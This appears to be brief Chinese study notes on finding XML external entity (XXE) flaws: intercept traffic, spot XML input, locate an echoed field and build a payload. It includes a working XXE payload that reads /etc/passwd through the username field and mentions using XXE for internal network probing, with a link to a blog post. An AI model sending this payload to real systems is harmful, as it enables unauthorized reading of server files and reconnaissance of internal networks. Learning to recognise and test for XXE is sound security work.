如何知道是否有xxe漏洞
抓包
看格式像xml
看回显点
构造payload,读取文件
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///etc//passwd">
]>
<user><username>&xxe;</username><password>admin</password></user>
XXE内网探测
https://blog.csdn.net/weixin_43221560/article/details/108152738